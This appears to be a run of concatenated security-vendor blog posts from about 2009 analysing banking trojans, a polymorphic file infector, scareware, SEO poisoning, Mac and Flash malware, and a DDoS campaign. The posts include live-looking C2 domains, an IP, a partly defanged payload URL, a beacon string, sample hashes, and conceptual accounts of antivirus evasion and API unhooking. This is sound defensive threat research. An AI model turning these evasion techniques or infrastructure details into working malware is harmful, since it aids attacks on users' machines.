This is one “helper” you don’t want on your side: Once installed and automatically loaded by the browser, Silentbanker can interrupt communication between your browser and the Internet! The malware is highly configurable and targets online banking users. Silentbanker will not only recognize and monitor online banking activity but may also modify HTML pages to include additional code or to change a transfer’s details. The data thief acts as a “man in the middle” to inspect and modify data before it is encrypted and sent to a server and after it is received from the server and decrypted. Still think you’re secure with SSL? Unfortunately that’s not the case with this freeloader sitting on top of the browser.

The screenshot above shows a pseudocode representation of Silentbanker’s malicious core. The code is responsible for detouring relevant operating system functions to its own malicious routines. This malware effectively kills security applications such as host intrusion prevention systems and others. Before its own malicious detours are installed, the malware disables any previously installed detours by reading a Windows library’s original code from the hard disk (”read_whole_file”), and then mapping it back to the process’ memory (”remove_API_hooks”)—thus rendering security products relying on the same technology ineffective.

Be sure to run McAfee VirusScan and Artemis, and McAfee Gateway Anti-Malware within your corporate network to protect your systems from password thieves.

Nowadays, most anti-virus products can deal with viruses relatively easily using a variety of technologies. Decent emulator-based scan engines can handle a majority of polymorphic and metamorphic viruses, including those that use the entry-point obscuring technique (EPO). But when it comes to viruses with delay load and random code blocks insertion such as W32/Zmist, (a.k.a. Mistfall) code emulators are not the best approach. We recently came across a new W32/Xpaj variant that is actively spreading. It utilizes well-known techniques to evade detection that are otherwise seldom found in live virus analysis.

The new W32/Xpaj uses a random code block integration technique to infect files. It does not change the original entry point of the file. Instead, W32/Xpaj builds several code blocks responsible for different functionalities and moves them into random locations throughout the code section of the infected file. It is similar to what W32/Zmist used to employ, but W32/Xpaj uses code replacement instead of code insertion.

Its polymorphic decryptor is represented by a number of code blocks linked by unconditional jumps. Once executed, the polymorphic decryptor gains control and performs different tasks:

1. Saving the original state of the infected application and preserving all the registers used by the virus
2. Changing the protection flags of the memory where the virus body is located
3. Decrypting the virus body
4. Jumping to the decrypted virus body, etc.

Each task may be located in a separate block of code or combined in one big block.

Once decryption is done, control passes to the main virus body, usually located in a different section. Its authors decided to use register-based jumps instead of relative jumps. The former, together with a heavily encrypted virus body and stolen functions, make this new variant more complicated to repair:

In an attempt to make sure the virus is executed at least once, W32/Xpaj searches and replaces a number of call instructions to point to the beginning of one of the virus code blocks created during the infection.

The random location of the polymorphic code blocks means that for some samples, code emulators may never reach the viral instructions. Such samples may present a hidden surprise to some anti-virus vendors, which might not be able to detect all instances of W32/Xpaj, missing a certain percentage of infected files. However, in other cases, the virus may never gain control at all, such as in the following samples found in the wild:

• 4843998e3564ac1a1e137149bc3ce28e
• 8e4260d0a29c0133bad3bc0e39057456
• db4fff8a4a21e9c824cde3ebd151fbf2

While decrypting the virus body, W32/Xpaj may generate millions of iterations. Code emulators without decent support of dynamic code translation may fail to run it through correctly. It integrates itself into infected files and becomes a part of the host program control flow. Original functions replaced with the virus decryptor are saved, encoded, and are located in the same section with the virus body.

This variant of W32/Xpaj increases the virtual size of the section containing the virus body by 150KB. It is heavily obfuscated and contains functionality to receive further instructions from remote servers:

• tooratios.com (82.98.235.66)
• abdulahuy.com (82.98.235.66)

The server is currently active and located in Belgium, and sends instructions through the following file:

• hxxp://abdulahuy.com/{blocked}/stamm.dat

Interestingly, the malware authors decided to monitor its own virus activity and included logging support to this beast. Every file infected with W32/Xpaj reports to the above-mentioned server and sends information about the system (OS version, Service Pack, IP, etc.) on which the infected file is running:

os=00000005.00000001.02000B28 & amp;cm=18B51294&adn=A120BB0F & amp;knv=00000012 & amp;hdd=002F606E & amp;cid=0000000C & amp;vvr=00000001

The majority of AV vendors do not currently detect this W32/Xpaj variant (as seen in these VirusTotal results):

I revisited the topic of search-engine manipulation (a.k.a. blackhat SEO) in two recent posts. Something caught my eye while investigating cases of search-result poisoning–a shift away from tactics used by the attackers earlier in the year.

Previously, attackers mostly registered free websites to pull off their attacks. They would create a bunch of new sites, cross-link them, and use other tricks to get their pages indexed and ranked high on relevant search result pages (again, largely targeting the most popular search terms of the day, such as those found on Google Trends.) I blogged earlier in the year about how the user forum on democrats.org was leveraged to link a high-ranking site with newly created malicious sites.

It seems now that attackers are combing various elements of different attacks to achieve blackhat SEO.

There are currently many examples of high-ranking poisoned results that lead to compromised legitimate sites. This is a bit different than in the past, as now security vulnerabilities are being exploited simply for the sake of search-engine manipulation. 

Historically we’ve seen attackers upload malicious content to compromised sites, either directly by injected exploit code, or indirectly by injecting an iframe or script that brings in exploit code from a remote site.  Such situations can lead to site users notifying the compromised site administrator that they were attacked while visiting that site. Redirecting victims to a completely different site can help conceal the poisoned site.

The attackers go a step further by implementing a well used trick, which is to redirect conditionally.  It’s not enough for people to go to a compromised page; they must arrive there from a search-result page. In other words, users (or site admins) navigating to http://compromised-site.com/attacker_created_page will not be redirected to a payload site unless they are coming from a Google search-result page. 

Some of the compromised sites are running older, vulnerable phpBB and Word Press applications.  Others sites are serving attacker HTML pages, perhaps from compromised admin/user credentials or misconfigured web servers.

These events further blur the line between “trusted” sites and malicious content. This trend is likely to continue for years to come.

We hear a lot about cybercrime events concerning Facebook or Myspace, but do you know ASmallWorld? It is a private international community for the jet-set crowd and culturally influential people.

Yesterday the French police force (OCLCTIC), accompanied by FBI agents, arrested two French residents. They were suspected of hacking this social-network platform dedicated to the worldwide upper crust. They allegedly attempted to extort US$1 million from the webmasters to not divulge stolen data.

Two years ago, a paper named “Asmallworld.net: we have hacked the smartest worldwide website” made some noise in France.

Whether you mingle with the jet set or in other circles, be careful when you share information on your favorite social network platform!

“Illusion is needed to disguise the emptiness within.” – Arthur Erickson

I thought this was the perfect quote for fake anti-malware software or FakeAlert threats. FakeAlert malware imposes an illusion of protection on its users, but all thats within is an empty hollow inside. It has become a common sight for malware to be spoofing program file resources such as icons or company information from other legitimate software. One of the most spoofed resources are Microsoft file properties such as company information or icons from programs “calc.exe”, “notepad.exe”, even Windows folder icons. Why would they do this ?

It is easy for less- computer-savvy users to trust that a program is legitimate based on visible features of a file, such as its icon or file properties. Its a nice facade for malware to slip through. We recently came across a FakeAlert threat that attempts to disguise itself as a McAfee product using a spoofed McAfee icon. Perhaps FakeAlert malware authors are taking notice of McAfee as one of the world’s most trusted security companies.

Call it social engineering or just another sneaky attempt to get by. The bottom line is, looks are deceptive so don’t trust everything you see whether its a resource icon or company information in the file properties. This FakeAlert malware that brands itself  as “AntiVirus Pro 2010” is all but a spin off of FakeAlert-XPSecCenter (aka WinreAnimator amongst its many re-branded names).

The following are some updated snapshots of FakeAlert-XPSecCenter:

Please beware of this FakeAlert variant and it is not in any way related to McAfee products. Safe Surfing !!

Another celebrity death.  Another recycled scareware tactic attempting to lure users to download malware by telling them that their PC is infected with a virus.  We saw it after the deaths of Michael Jackson, Farrah Fawcett, and Natasha Richardson earlier this year.  Now the attention of cyber criminals has turned to Monday’s death of Patrick Swayze as the soup du jour for malware distribution.

Queries for information on the death of the popular actor may lead to news stories that look legitimate when returned in search results, but when followed may lead users to a site that looks like this:

This similar tactic of presenting a window to the user that looks very much like a legitimate Windows popup has been used many times before in various forms.  The Windows Explorer-like screen presented to the user also uses geolocation in an attempt to identify the country and city that the user is coming from in to make the user believe that their data is actively under attack.  Popups with phrases like “Scan procedures finished.  34 Potential aggressive items was found!” and “Your computer remains infected by threats!  They might lead to data loss and file structure damage, and needed to be heal as soon as possible.  Return to Total Security and download it secure to your PC” also attempt to trick users into believing that the only way that they can protect themselves from infection is by downloading bogus security software.

Clearly scareware tactics are something that cyber criminals have latched onto as a popular method for malware distribution as it continues to be a recurring and evolving theme.  Conficker/Downadup largely popularized scareware with its success (although it wasn’t the first to use it) and now others are riding of that popularity to re-purpose it for their own scams.

Wouldn’t you know it. Just the other day I blogged about rogue anti-virus software makers selectively targeting certain hot search terms. Since then the majority of top terms lead to poisoned links within the top 10-20 search results.

Recently there have been some news stories about attackers targeting specific topics or terms, but from what I’m seeing they are pretty indiscriminate. It doesn’t matter what the topic is. If people are searching for it, then the bad guys want to poison the results. The speed at which these links appear suggests the operation is largely automated. 

Here’s one example for bengals blackout. One potential way of identifying a bad link is if the title is exactly the same as search term, it’s in all-capital letters, and the URL contains the search terms as well. The summary usually contains the text you’d expect to find from a news story. This is not a foolproof way to call something bad, but it’s a strong indication that something might be fishy.

Search safe.

Today we released the new version 2.1 of McAfee FileInsight. You can download your free copy from the Avert Tools site. FileInsight is a handy integrated tool environment for web site and file analysis. Hex editing, syntax highlighting, and it comes with several built-in decoders, built-in calculator, a disassembler, JavaScript scripting support, a Python-based plugin system and many more.

Let’s go through some stages of an exemplary malware attack to highlight some of its analysis features – but don’t try this stunt at home, unless you know what you’re doing; a safe, isolated lab environment is absolutely mandatory for any such research work.

The above screen shows the initial malicious web site, trying to determine your browser and redirect to one or more respective exploits of choice. One of them being an exploit for the Microsoft DirectShow Video ActiveX Control Vulnerability (MS09-032) (stopped as “Exploit-MSDirectShow.b” by McAfee Virus Scan and as “BehavesLike.Exploit.CodeExec.EBEO” by McAfee Gateway Anti-Malware).

Getting to the actual shellcode takes some JavaScript unpacking steps. The JavaScript code is spread over several script files and custom encoded. In the above screen, we take that malicious code into FileInsight’s Scripting window and let it deobfuscate there.

Once we’re down to the shellcode level, we can directly look at the shellcode in the built-in disassembler. The Disassembler window also features recursive traversal to come up with branch labels automatically. It CALLs-to-POP in order to determine actual memory location of the obfuscated payload, sets up and loops to decode the payload, and then executes that in order to download a XOR-obfuscated executable that turns out to be a UPX-packed backdoor (stopped by Artemis and by McAfee Gateway Anti-Malware as „LooksLike.Win32.Suspicious.C“). Advanced users may also want to look into FileInsight’s Python-based plugin system, but be warned: writing plugins at the overwhelming simplicity of the Python language has a certain addiction potential!

FileInsight is available here.

The recent onslaught of “Chinese pharmacy” spam and the DDoS attacks that took down Twitter, Facebook, and others have caused a frenzy of speculation about the Chinese government’s involvement in spam generation and acts of cyberterrorism. McAfee’s September 2009 Spam Report debunks these rumors and gets to the root of the cause.

The report reveals the truth behind the “Chinese pharmacy” spam:

• “Chinese pharmacy” spam appears to be the result of a need for regional pharmaceutical companies to offload excess drugs internationally, as selling excess drugs inside the country violates Chinese law. We just don’t believe this month’s onslaught is a sinister government plot.
• Spam originating from China can often make up between 60 percent and 65 percent of today’s global email volume
• “Chinese newsletter” spam emails were the leading type of pharmaceutical spam, with a total of 52,428 emails that contained 1,235 unique URL domains in a single day
• If excess drugs in China cannot be sold into the legal market due to Chinese law, then they will continue to be sold on the black market

Furthermore, the report uncovers findings that have surfaced since the August 6 DDoS attacks:

• The August 6 spam campaign, launched in conjunction with the DDoS attacks, was not solely responsible for the downfall of the social networking sites and, in fact, was likely a mere afterthought of the attacker
• The August 6 DDoS and spam attack was intended to target a pro-Georgian blogger, and was likely part of an intimidation campaign in retaliation for his political blogs
• Brazil, Turkey, and India were among the top three domains from which infected machines spread the August 6 spam campaign in conjunction with the DDoS attack

Check out the full report here.

It is certainly not surprising when scammers use major events such as the upcoming FIFA World Cup 2010 to fuel their scams, but I am surprised at how early they started this time!

In fact, the scammers are taking advantage of two events: the soccer World Cup in South Africa next summer and the 75th anniversary of the first flight of a major airline. Two days ago a coworker forwarded me this mail:

With the first part of the text stolen from a U.K.-based riding holiday website and then adding the usual “Hey, you just won a really cool prize. Just send me all your personal information” spin, this scam is certainly not the most sophisticated we shall see. But to my knowledge it is the first.

So as you anticipate your team’s lifting the trophy next July, be careful what emails you reply to or what links you click on. For links in email, do as I do: Don’t click any of them.

Update of September 3:

Some detections of this Trojan were on a component of a commercial application. For this reason we’ve updated the detection type to “potentially unwanted program” (PUP). Customers who see files that exhibit the behavior discussed in the Threat Library for QTaskMgr-1 should submit the file to McAfee Avert Labs.

In anti-virus research, context is everything. We had a sample that was not signed correctly and behaved suspiciously. We have to think of our users security; thus we detected the file. Without knowing that the sample was part of a nonmalicious application, we had to assume it was dangerous.

One reason we make this assumption is due to cases such as files infected with Induc. Here, even if the binary’s resources check out, it’s still compromised. If it looks bad, smells bad, tastes bad, and you’re not told otherwise—then it probably is bad.

Original blog, published September 1:

We’ve heard about malware that reduce a computer’s state of security. These malware might, for instance, disable your access to the registry, lower Internet Explorer’s security configuration, delete system files, or manipulate the system’s DNS settings. Each of these steps exposes the victim to graver malware infections or system compromise.

Yesterday we ran into a Trojan that weakens the victim system’s security by making registry changes. The malware disables Task Manager, Windows Update, and toolbars in Internet Explorer. Further, it does not let you lock your machine or change your password. If you pressed Ctrl+Alt+Del after the infection you would see this:

Because losing Task Manager is the most damaging security attack on our list above, we’ve called this Trojan QTaskMgr-1. We include detection and cleaning for QTaskMgr-1 since the 5727 DATs, released September 1.

There is a light at the end of the tunnel—risk and compliance technologies and standards are relieving auditors and businesses in this age of increased electronic accountability. On the heels of our integration of SolidCore’s technology, researchers from McAfee Avert Labs have laid out the compliance challenges facing organizations, and the new standards that can save thousands of hours, in the latest edition of the McAfee Security Journal.

Organizations Suffer from Audit Fatigue

Of the many compliance obstacles facing organizations, the sheer volume of audits is perhaps the most oppressive impediment to returning to “business as usual.” With more than 400 separate sets of requirements facing organizations internationally, global institutions can face more than 40 diverse mandates. Failure or noncompliance is not an option, as reputational damage and severe consequences levied by regulatory agencies can have severe financial consequences for businesses.

In a McAfee-sponsored survey, one organization estimated that to prepare for their PCI audit, the company spent 1,000 hours in one week to configure audit settings. Another organization spent more than 18,000 hours to prepare for external audits in one year. Even when faced with such overwhelming compliance demands, more than 51 percent of organizations surveyed still used spreadsheets to execute audits.

Three Steps to a Better Audit

Organizations that embrace IT as the path to solving compliance issues should follow three key steps to combat audit fatigue:

1. Establish a governance committee: By connecting executives with operational realities, a governance committee can help focus compliance spending where it will be used to its fullest
2. Automate the IT audit process: By investing in risk evaluation and auditing technology, companies can automate the vast majority of once-manual, time-consuming tasks, better ensuring ongoing compliance and reserving IT energy and spending for strategic priorities
3. Adopt a well-built framework: By adhering to a consistent framework throughout an organization, IT can consolidate the number of separate audits it must conduct

SCAP Leads the Way in Next-Generation Audit Standards

The emergence of the Security Content Automation Protocol (SCAP) signals a change in traditional risk and compliance architecture. Using SCAP-compliant products, companies can now eliminate the need for vendors to issue updates when new policy or regulatory mandates are decreed. By immediately integrating new changes in policy, SCAP improves vulnerability detection, asset management, risk monitoring and response, threat publishing, and more. As more technologies support the continuing evolution of audit demands and evolving infrastructures, the more automated the audit process will become.

To learn more about McAfee’s insights into the status of risk and compliance technologies, read the newest edition of the McAfee Security Journal.

The W32/Induc virus has been in the wild for at least a year. During this period it has succeeded in infecting a lot of Delphi installations, including manufacturers of some pretty popular software packages.

On a victim’s machine this virus searches for the presence of a specific version (4.0, 5.0, 6.0 and 7.0) of the Delphi compiler. The virus gathers this information using the registry entry below.

If it finds one of these versions, the virus inserts its code into the file SysConst.pas, which is present in x.0\Source\rtl\sys. The virus renames the current Sysconst.dcu, which is present under the Delphi library folders, to SysConst.bak. The SysConst.pas file containing the viral code–like the one shown below–is complied using the Delphi command line compiler dcc32.exe to create an infected SysConst.dcu. The original SysConst.pas file is then deleted.

McAfee detects all files that have been compiled with the infected Delphi program as W32/Induc. Some customers have contacted us suspecting that this result is a false positive, but this is known correct detection from McAfee.

This virus does not have a malicious payload. It just spreads through the compiled executables.

We generally classify email messages pretending to be from a family member of a (often African) dignitary or from a desperate young woman as scams. In the first case, the sender sometimes explains that following the death of an influential dignitary a large sum of money is blocked in a bank account somewhere. With the recipient’s help and using his or her financial backing for a money transfer, the sender says that it would be possible to release the money. Substantial compensation is offered to whoever agrees. In the second case, the unknown beauty becomes a friend with the victim and suddenly has a terrible money problem.

For some individuals, these swindles, called advance fee fraud (also known as 419 fraud) and romance scam, are a primary source of revenue. They also employ lottery and fake price scams.

In Eastern Europe senders remain discreet and hide their wealth. But in some African countries such as the Ivory Coast, many crooks work openly. After reading a news item on this subject at the France24 observers web site, I searched the French Skyrock social networking platform and discovered the photos and videos from their exploits. Each crook has his own blog entries and is attached to a gang web page were each member is listed in a friends list. They are plenty boastful. Among the group names, we have:

• les banquiers arabes (the Arab bankers)
• la banque africaine (the African bank)
• les boucantiers de la Cote d’Ivoire (The Ivory Cost boucantiers)
• les plus riches (the richest)
• etc.

Here is one example:

According to 419 AFF, losses from advance fee fraud in 2007 by companies and individuals reached US$4.3 billion.

In France, one naive victim recently lost €1 million!

Last year, Janella Spears of Oregon is reported to have lost $400,000 (£270,000) after falling under the spell of one such criminal. Here is her account:

The naive are numerous, and cybercriminals know it. We must remain vigilant.

Agreement and collaboration have been two of the greatest challenges the security community has faced from the very beginning. In an effort to address this, The Industry Connections Security Group (ICSG), a new offering from the IEEE, allows like-minded companies to come together to solve industry or business problems that center on information security. Industry Connections is a program under the IEEE that allows for a fast start-up toward industry collaboration. It also offers the support and infrastructure of an established and well known brand—the IEEE itself. This effort will allow the group to focus on the work of security standards and problem solving, rather than being slowed down with issues such as incorporation or intellectual property matters. McAfee is proud to be a founding member of this effort.

The ICSG is a group of computer security organizations that will work together on common goals and industry issues. The key focus of our collaboration is to solve security issues. In the past few years, attackers have shifted away from mass distribution of a small number of threats to micro distribution of millions of distinct threats. ICSG was established, under the umbrella of the IEEE Standards Association (IEEE-SA) Industry Connections program, out of the desire by many of us in the security industry to pool our experience and resources in response to the systematic and rapid rise in new malware being introduced to the market. The bad actors have been able to leverage the underground economy and scale their efforts, they have access to specialist tools and services, and they collaborate and communicate effectively—whereas the security industry has been generally responding to threats as individual entities.

Although there has been some ad-hoc cooperation in the industry in areas such as malware and phish URL sharing, this cooperation has not been standardized or documented in a format that lends itself to systematic improvement in operational efficiency or visibility, or review by people outside the vertical industries. It is this collaborative and communicative gap that the ICSG looks to close. ICSG has been established to look at and deal with a wide variety of security issues in a forum that allows us to engage all types of industry verticals. We also anticipate that we can work with other efforts to help drive security standards in other areas.

ICSG currently has one team, the Malware Working Group, looking at malware, but the organization will add more as needs evolve. Malware growth has been meteoric for the last several years. As such, the Malware Working Group’s primary goal is to solve some of the malware-related issues the industry faces today. The initial focus will be to establish more intelligent ways of sharing malware samples and the information associated with them to make the computer security industry more effective at combating this ever-evolving threat.
The initial members of ICSG are McAfee, Microsoft, Symantec, Sophos, AVG, and Trend Micro. A number of other individuals have been involved in reviewing the initial document produced by the Malware Working Group, from a variety of companies involved in computer security. If you are looking to join or need info, contact us at:

• joinICSG@ieee.org, joinICSGMal@ieee.org, IndustryConnections@ieee.org

Procedures and policies that have been adopted can be viewed here. Information about the Malware Working Group can be found here.

Twitter, LiveJournal, FaceBook, Youtube, Fotki–what do they have in common? They all hosted an account of a pro-Georgian blogger who went under the nickname cyxymu (taken after Sukhumi, the capital of Abkhazia, one of Georgia’s pro-Russian breakaway republics and the city he professed to flee from in 1993 during the republic’s war with Georgia). And they all suffered a distributed denial-of-service (DDoS) attack during the course of the day yesterday, an attack that was able to take down Twitter for several hours and significantly slow down connectivity to Facebook. Reportedly, the attack packets sent to the targeted social-media sites were requests to fetch the pages hosted for this user, who had just a few days ago blogged about the upcoming one-year anniversary of the war between Georgia and Russia.

In addition to the web-based DDoS attacks, McAfee’s TrustedSource reputation system had also detected a spam campaign that referenced the targeted blogs. We believe this campaign had a dual purpose. On one hand, the attackers spoofed the email address of the blogger, which is hosted on Gmail, as the originator of the spam. As a result, the blogger’s inbox was flooded with out-of-office notifications and vacation bounces automatically sent by mail clients of people who had received this spam. This was likely part of an intimidation campaign designed to send a message to cyxymu about who was the real intended target of the DDoS. In addition, the spam contained links to the blogger’s sites, with the likely goal of bringing even more traffic to bear on the servers of those blogs than would already be caused by the DDoS. 

Screenshot of the spam bounces in cyxymu’s mailbox that he had posted after the attack on abkhaziya.net, one of his backup blog sites

In our analysis, the spam appears to have been distributed, at least partially, by the same botnet as the one that was used for the DDoS. Of the infected machines spreading the spam, 29 percent were located in Brazil, 9 percent in Turkey, and 8 percent in India.

We detected two distinct spam runs that began around 8 a.m. EDT on Thursday, August 6 and started winding down around 11 a.m. the same day, with the last messages being detected at 4 p.m. Only the second spam run, the larger of the two, spoofed cyxymu’s email address, while the first one randomized the senders’ email addresses.

URLs that were attacked include:

http://twitter.com/cyxymu
http://www.youtube.com/Cyxymu
http://www.facebook.com/cyxymu
http://cyxymu.livejournal.com
http://cyxymu1.livejournal.com
http://fotki.com/cyxymu

The IP addresses included in the attacks were detected proactively by McAfee’s TrustedSource as having a malicious reputation.

Today we released our Q2 Threats Report. Some old trends have continued. Some new trends and threats have been established, and some old “friends” have even outdone themselves. Spam volumes have increased 141 percent since March, continuing the longest ever streak of increasing spam volumes. We also highlight the dramatic expansion of botnets and the threat from AutoRun malware.

More than 14 million computers have been enslaved by cybercriminal botnets, a 16 percent increase over last quarter’s rise. The report confirmed our first-quarter prediction that the surge in botnet growth would send spam levels to new heights, surpassing their previous peak in October 2008 before the takedown of the spam-hosting ISP McColo.

Our researchers also found that over the course of 30 days AutoRun malware had troubled more than 27 million files. AutoRun malware, which exploits Windows’ AutoRun capabilities, does not require any user clicks to activate, and is most often spread through portable USB and storage devices. The rate of detection surpasses even that of the infamous Conficker worm by 400 percent, making AutoRun one of the most prevalent pieces of malware in the world.

Some of the other areas we cover and discuss:

Cybercrime as a Service
As the number of botnets continues to grow, malware writers have begun to offer malicious software as a service to those who control these bots. By exchanging or selling resources, cybercriminals distribute new malware to wider audiences instantaneously. Programs like Zeus–an easy-to-use Trojan creation tool–continue to make the creation and management of malware even easier.

Cybercriminals Target Twitter, Social Networks
Twitter’s growth in popularity has made it a new target for cybercriminals in the last three months. Malware like the “Mikeey” worm and new variations of the Koobface Trojan attack users through tweets and abbreviated URLs. Spam Twitter accounts are becoming increasingly prevalent. Twitter administrative accounts have also been hacked on multiple occasions, giving cybercriminals access to the private accounts of celebrities and politicians, such as Britney Spears and Barack Obama and even allowing for the publication of sensitive internal strategy documents on the Web. Facebook and MySpace remain strong attack vectors for cybercriminals. In May, spam messages on social networks pointed users to more than 4,000 new Koobface binaries!

To view the McAfee Q2 Threats Report, go here.

Following up on the recent post by my colleague Dave Marcus concerning malware growth, the guys from AV-Test in Germany just released their updated stats. To avoid confusion when comparing the different numbers, here’s a quick explanation of the different counts:

AV-Test counts unique binaries. Unique means different cryptographic hashes. So the same Trojan, obfuscated with 10 different packers results in 10 unique binaries. This is often due to the impact of server-side polymorphism, where you get a unique binary every time you download a file.

Our outbound counting, as used by Marcus, counts the threats for which we have to create a driver for detection. If in the example above we are able to look beneath the obfuscation layer of the packers, the 10 different binaries would be counted as just one Trojan. In addition to that, we frequently use generic detection, in which a single count could hit on thousands of minor variants.

Now that the different ways of counting may be a bit clearer, let’s look at the bad news:

AV-Test’s count has come close to 22,000,000 samples in June.

(Click here for a larger image.)

This by itself is disturbing, but the really disturbing trend is visible when we look at the growth month over month:

(Larger image here.)

The growth has been fairly constant over the last year but this has changed now.

We are now seeing a major increase in the monthly growth, topping one million new samples each month in AV-Test’s count. And this time it’s not only samples (the same piece of malware packed over and over again) but also actual new malware. If you look at Marcus’ numbers again–growth in 2009 has nearly tripled compared with 2008 and remembering that we count malware rather than samples–this indicates there has been a shift recently in malware production. Tons of new Trojans have been developed and released on top of the reused stuff.

So keep your machine updated, not just AV and the OS but all applications. Watch out where you surf. (SiteAdvisor may help you there.) And take care what links or attachments you trust in emails and all other forms of messages. All this will help you enjoy the summer!

Erin Andrews is a popular ESPN sports reporter in the United States who recently made headlines outside the sports arena. In an unfortunate case of privacy invasion, a video purportedly capturing private moments of the reporter through a hotel room peephole was released on the Internet. The video generated a considerable amount of news.

In our world of anti-malware, we follow a simple formula, “Media + Celebrity = Watch out for malware”. Whether you are an eager fan or just someone surfing on the web for news, beware. An Internet search, combined with the right keywords on your favorite search engine, is expected to lead you to malware. In our investigation on the following case, it has led us to a malicious website hosted at [removed].report-cnn.com/[removed].

Although it was made to look like a real one, this website is NOT related to CNN. At the time of research, it was still live and distributing malware using the “you need a video player” technique that has been repeatedly used in similar attempts in the past. Using this method, the user is often enticed to an attractive video but must install a new video player program.

The victim clicks on a link that allows downloads and installs an executable program which subsequently installs malware. It usually follows with a pop-up message reporting that the downloaded video player program is corrupted!

The current case comes with a slight twist. An option to download the “video player” is given only if you already have Adobe Flash installed. This first step allows users to view some initial pictures, as if they were browsing legitimate news content from the site. It then further entice users to view the “live video” by installing a video player, which instead contains malware. Once the malware is downloaded, a video is actually streamed to the user off an external link from Google. This link, of course, has nothing to do with the downloaded video player. Gullible users would actually believe that running the downloaded program enabled them to view the video.

This malicious website recognizes the target operating system by checking the User-Agent banner information sent to the web server by the web browser client. In our tests, a .exe file is delivered to a Windows-based web browser while a .dmg file is delievered to Mac OS-based web browsers.

The malware downloaded from this site are currently detected as FakeAlert-DA and FakeAlert-EL. For Mac OS users, the MediaPlayer.dmg malware will be detected as OSX/Puper.a Trojan. In other related cases, we are currently detecting them as Generic FakeAlert.a and Generic FakeAlert.c.

We advise Internet users to refrain from installing programs that are linked to hot news and media sites.

As a follow-up to our two recent blogs, we want to provide some details for this zero-day exploit from the perspective of the McAfee Network Security Platform (formerly known as IntruShield).

Unlike traditional ActiveX exploits, in this case the Microsoft Video ActiveX controls are being used to load malicious image files and trigger the vulnerability. McAfee Network Security Platform detects this exploit attempt using the attack signature HTTP: Vulnerability in Microsoft Video ActiveX Control Could Allow Remote Code Execution. At this point, we have seen active attempts in the wild trying to exploit this vulnerability. Figure 1, below, shows one such attempt as viewed on the Alert Viewer and Figure 2, bottom, shows the corresponding packet capture from the evidence report.

Figure 1. Exploit attempt alert

Figure 2. Packet capture from evidence report

Microsoft Security Advisory 972890 says customers can set the kill bit for a bunch of Class Identifiers. Any attempt to use these Class Identifiers for exploitation can be detected using the audit signatures HTTP: Potential Harmful Microsoft Video ActiveX Control I, HTTP: Potential Harmful Microsoft Video ActiveX Control II, and HTTP: Potential Harmful Microsoft Video ActiveX Control III.

All of the attack signatures described above were released on July 6 in the following network security signature sets.
• 5.1.22.14
• 4.1.52.14

We recently received a new sample of the Mac malware OSX/Puper.a. This file [MD5 Sum: 428143005E07E510302BA431FE0C28CC], which disguises itself as a Mac Cinema Installer, was recently mentioned in PC Magazine.

When the DMG file is executed on the Mac, it displays the following message:

As the execution continues, the malware gets installed on the machine with the root user’s credentials. Below is a screen shot of the malware after installation:

The file AdobeFlash in the screen above is the malicious script file. This file is obfuscated using Uuencode and looks like this before decoding:

And like this after decoding:

From the shot above we can see another set of obfuscated code after the schedule-task instructions. We can also see that the malware creates a scheduled job to run itself once every five hours, shown as below:

Decoding the rest of the script reveals the following:

From the screen above we see that the malware downloads the file generator.pl and executes it.

Although the number of malware for Macs still remains tiny when compared with the number of malware for Microsoft Windows, new variants of malware such as this remind us to be careful.

Adobe Flash applications have been a major security concern during the past couple of years. The large number of Flash vulnerabilities published, coupled with its popularity and wide distribution, makes Flash files an attractive target for cybercriminals. Infecting banner ads are not new; these Flash-based “malvertisements” have plagued adservers and popular websites for a very long time.

A malicious Flash file can be crafted to contain an image or an animation to fool unsuspecting users into believing the file is legitimate. Lately, we have observed a spike in the number of websites hosting malicious flash files that exploit the integer-overflow vulnerability in the DefineSceneAndFrameLabelData tag. These are popularly known as Exploit-CVE2007-0071.

Although the vulnerability has been fixed for some time, the bad guys are always coming up with new and progressive mechanisms to evade detection.

Flash Player 9 and later comes with a new virtual machine called ActionScript Virtual Machine 2 (AVM2), which is designed to execute programs written in the ActionScript 3.0 language. ActionScript 3.0 supports a native method called loadBytes().

The flash.display.Loader class supports the loadBytes method, which takes a byte array to fill the loader with data. The bytes injected can be in the form of GIF, JPG, PNG, or SWF files. Embedding the vulnerable SWF (small web format) file inside the loader provides attackers the multifold advantage of ensuring successful exploitation while complicating the analysis for researchers.

The image above shows the embedded malicious SWF file inside the loader file. This loader uses the loadBytes method to inject the bytes into the security context of the application.

In recent versions of the exploit, the embedded SWF file is encrypted using various obfuscation techniques such as byte-shifting algorithms or random XOR keys, as shown in the figure below.

We expect this trend to continue as cybercriminals target low-hanging fruit such as applications, and Flash is no exception. As always, make sure you are protected and the Flash player is updated to the latest version. Happy surfing .

Since we reported about the new attacks against Internet Explorer exploiting a vulnerability in a DirectShow ActiveX object, we have released DATs/coverage updates for many of our products and technologies.

Current status for each of the content areas:

• Malware: Coverage is provided for exploit code in the 5668 DATs, released on July 6
• HIPS: Generic buffer overflow should provide coverage
• McAfee Network Security Platform: Coverage was provided on July 6
• McAfee Vulnerability Manager: Coverage was provided on July 6
• MNAC: Coverage will be provided in the next release
• VirusScan Enterprise: Buffer overflow protection should provide coverage
• McAfee Web Gateway, Anti-Malware Edition: Behavior analysis provides coverage against currently known exploits

Other Internet users and website administrators can also download the free Stinger tool to scan computers and web pages for known malware relating to this attack:

• http://download.nai.com/products/mcafee-avert/stinger.exe

We will continue to monitor the situation to provide comprehensive coverage.

It has been almost a year since the rogue anti-virus products, a.k.a. scareware, became rampant.  These Trojan families are typically spread via drive-by downloads, search-engine-optimization poisoning, spam campaigns, and clever social engineering.
Having these methods discussed in earlier blogs, today we will look into the protection mechanisms adopted by these fake alerts Trojan families to evade detection from antivirus vendors.

• Code obfuscation using junk instructions

In the above screenshot, lots of junk code is visible between valid instructions. Usage of junk instructions is being used widely across Fake Alert families.

• Fake API calls

The screen shot shows the usage of API called SetArcDirection which is not necessary in the code. These kinds of unnecessary APIs are used by malware to defeat emulation. Sometimes, API calls that don’t exist are also used by these families to check if they are being emulated.

• Customized packer

Lot of fake alert families uses their own custom packers, encryption routines.  Some of the families patch the existing packers.

• Use of XMM and MMX instruction sets

Usage of XMM, MMX and FPU instructions which are not needed in the code along with the other junk code are also utilized by most of the fake alert families.

The techniques discussed above are not something very new and has been used in notable malware. But fake alert Trojans use these evasion techniques to there full potential with every new variant. Just when we thought we’re seeing a decline in adware and spyware – fake alert Trojans families have stepped in to claim the scum of the Internet tag.

With the current news about the deaths of Farrah Fawcett and Michael Jackson, it’s a good idea to remind our readers to beware of blackhat attempts to distribute malware to anyone looking for news.

